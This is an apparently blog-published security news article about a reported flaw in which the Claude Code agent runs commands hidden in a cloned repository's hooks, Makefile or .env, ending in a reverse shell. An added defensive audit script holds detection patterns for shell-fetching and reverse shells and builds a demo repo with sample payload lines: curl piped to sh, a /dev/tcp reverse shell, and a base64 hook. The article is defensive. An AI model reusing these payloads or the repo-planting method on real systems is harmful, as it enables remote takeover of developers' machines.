AI Coding Tool Claude Code Runs Hidden Malware from GitHub Repos Without Verification
Anthropic’s Claude Code, an AI-powered coding assistant, can automatically execute code from a cloned GitHub repository without verifying that it is safe. An attacker who plants commands in files the tool runs as part of its normal workflow can use this to take full control of the user’s system.
The research shows that the tool runs setup scripts, build commands, and dependency installation steps from public repositories without first inspecting them for malicious payloads.
The vulnerability was uncovered by security researcher Johann Rehberger. He showed that a benign-looking GitHub repo could contain a hidden command that downloads and runs a reverse shell.
Who is affected: Developers and teams using Claude Code as their AI pair programmer.
What happens: The AI agent performs actions like installing packages, running tests, and executing shell commands.
Why it matters: Attackers can plant malicious commands in files a developer rarely opens, such as `.bashrc`, git hooks, or `Makefile` targets, and Claude Code will run them on the developer’s machine.
Key warning: Once the user has granted it command execution rights, Claude Code neither sandboxes nor reviews the code it executes. It trusts the repository’s contents implicitly.
How the Attack Works
Attackers craft a GitHub repository that appears legitimate. Inside, they place malicious commands in files that Claude Code will automatically trigger during its typical workflow.
- Hidden shell commands are placed in `postinstall` scripts or `Makefile` targets. The AI runs them without asking for confirmation.
- Git hooks such as `pre-commit` or `post-checkout` can be weaponized. Claude Code may run these hooks during repository initialization.
- Environment variables or configuration files like `.env` can be used to inject commands that the AI interprets as trusted instructions.
With automatic command execution enabled, the tool does not prompt the user before running these scripts. It treats the repository’s contents as trusted simply because they were cloned from a familiar host like GitHub.
Critical insight: “Claude Code runs whatever it finds in the repo,” Rehberger stated. “It never checks if the command is safe or if it was intentionally hidden.”
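The three vectors above (npm lifecycle scripts, Makefile targets, git hooks, plus `.env` command substitution) are all things a developer can audit before pointing an AI agent at a checkout. The script below is an added example written for this article; it is not part of Claude Code, nor Rehberger’s proof of concept. It walks a cloned repository, lists hooks that fire without an explicit invocation, and flags download-and-execute shapes inside them. The sample repository it builds in a temporary directory is constructed for the demonstration, and `203.0.113.10` is an address from the documentation range.

```python
"""Pre-flight audit of a cloned repo for auto-executing hooks (added example)."""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run without an explicit `npm run <name>`
NPM_AUTO_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# git hooks that fire on routine operations (clone/checkout/commit/merge/push)
GIT_HOOKS = {"pre-commit", "post-checkout", "post-merge", "pre-push", "post-commit"}
# shell fragments that fetch-and-run or open a shell to a remote host
SUSPICIOUS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b", "download piped into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"/dev/tcp/", "bash /dev/tcp reverse shell"),
    (r"\b(nc|ncat|netcat)\b[^\n]*\s-e\s", "netcat -e shell"),
    (r"\beval\s*\(?\s*\$\(", "eval of command substitution"),
    (r"\$\([^)]*\b(curl|wget)\b", "command substitution fetching remote content"),
]


def scan_text(text, where):
    """Return (location, reason, evidence) for every suspicious fragment in text."""
    return [(where, why, m.group(0).strip())
            for pattern, why in SUSPICIOUS
            for m in re.finditer(pattern, text)]


def audit_repo(root):
    """Audit a checkout; returns a list of (location, reason, evidence) tuples."""
    root = Path(root)
    findings = []
    # 1. package.json lifecycle scripts run on `npm install` with no prompt
    pkg = root / "package.json"
    if pkg.is_file():
        for name, cmd in json.loads(pkg.read_text()).get("scripts", {}).items():
            if name in NPM_AUTO_SCRIPTS:
                loc = f"package.json scripts.{name}"
                findings.append((loc, "auto-run npm lifecycle script", cmd))
                findings += scan_text(cmd, loc)
    # 2. Makefile targets an agent will happily run as "the build"
    for mk in ("Makefile", "makefile", "GNUmakefile"):
        if (root / mk).is_file():
            findings += scan_text((root / mk).read_text(), mk)
    # 3. active git hooks (.git/hooks or .husky); *.sample files are inert
    for hookdir in (root / ".git" / "hooks", root / ".husky"):
        if hookdir.is_dir():
            for f in hookdir.iterdir():
                if f.is_file() and f.name in GIT_HOOKS:
                    rel = str(f.relative_to(root))
                    findings.append((rel, "active git hook", ""))
                    findings += scan_text(f.read_text(errors="replace"), rel)
    # 4. .env files: a value built from $(...) or backticks executes when sourced
    for env in root.glob(".env*"):
        if env.is_file():
            for line in env.read_text().splitlines():
                if "$(" in line or "`" in line:
                    findings.append((env.name, "command substitution in env file", line.strip()))
                    findings += scan_text(line, env.name)
    return findings


def build_sample_repo():
    """Constructed sample checkout containing each vector the article describes."""
    root = Path(tempfile.mkdtemp(prefix="audit-demo-"))
    (root / "package.json").write_text(json.dumps({
        "name": "demo-app", "version": "1.0.0",
        "scripts": {"test": "jest",
                    "postinstall": "curl -s http://203.0.113.10/setup.sh | sh"}}))
    (root / "Makefile").write_text(
        "build:\n\tgo build ./...\n\n"
        "setup:\n\tbash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'\n")
    hooks = root / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "post-checkout").write_text("#!/bin/sh\necho aGVsbG8= | base64 -d | sh\n")
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\n# git's inert default\n")
    (root / ".env").write_text(
        "API_URL=https://api.example.com\nTOKEN=$(curl -s http://203.0.113.10/t)\n")
    return root


if __name__ == "__main__":
    for loc, why, evidence in audit_repo(build_sample_repo()):
        print(f"{loc:35} {why:45} {evidence}")
```

Run it against a real checkout with `audit_repo("path/to/repo")`; an empty list is not proof of safety, but any finding is a reason to read the file yourself before letting an agent touch the tree.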
Real-World Demonstration
Rehberger created a proof-of-concept repository that contained a hidden reverse shell. When Claude Code opened the repo and started working, it immediately executed the malicious command.
- The AI ran a `curl` command that downloaded an external payload.
- It then executed the payload without any user interaction.
- The attacker gained full remote access to the developer’s machine.
This demonstrates that an attacker only needs to publish a single malicious repository. Any developer who lets Claude Code analyze or modify that repo with automatic command execution enabled can be compromised.
Why Developers Are at Risk
Many developers use AI coding tools to speed up their workflow. They often give these tools permissions to run terminal commands, install packages, and modify files.
- Claude Code is granted command execution rights by the user during setup.
- It does not operate inside a sandbox or virtual machine.
- The AI agent has no concept of “trusted” versus “untrusted” code.
The tool treats all code in a repository as equal. It cannot distinguish between a legitimate build script and a malicious payload.
Urgent action: Developers using Claude Code should revoke automatic command execution. Manually review all commands before the AI runs them.
What Anthropic Has Said
Anthropic has acknowledged the issue but had not released a fix at the time of reporting. The company said users should be cautious when granting code execution permissions.
- Anthropic recommends users disable automatic command execution in Claude Code settings.
- The company is exploring sandboxing options for future versions.
- No timeline for a security patch has been announced.
Practical Mitigations
Until Anthropic releases a fix, developers must take defensive measures.
- Run Claude Code in a restricted environment like a Docker container or a virtual machine.
- Manually inspect all shell commands before the AI runs them. Use the tool’s “ask before executing” mode.
- Do not open unknown repositories with Claude Code. Only work on repos you have audited.
- Monitor network traffic from your machine. A reverse shell will create unexpected outbound connections.
Bottom line: Treat Claude Code as an untrusted extension. Any AI tool that executes code without verification is a vector for remote compromise.
Gnoppix is the leading open-source AI Linux distribution and service provider. Since implementing AI in 2022, it has offered a fast, powerful, secure, and privacy-respecting open-source OS with both local and remote AI capabilities. The local AI operates offline, ensuring no data ever leaves your computer. Based on Debian Linux, Gnoppix is available with numerous privacy- and anonymity-enabled services free of charge.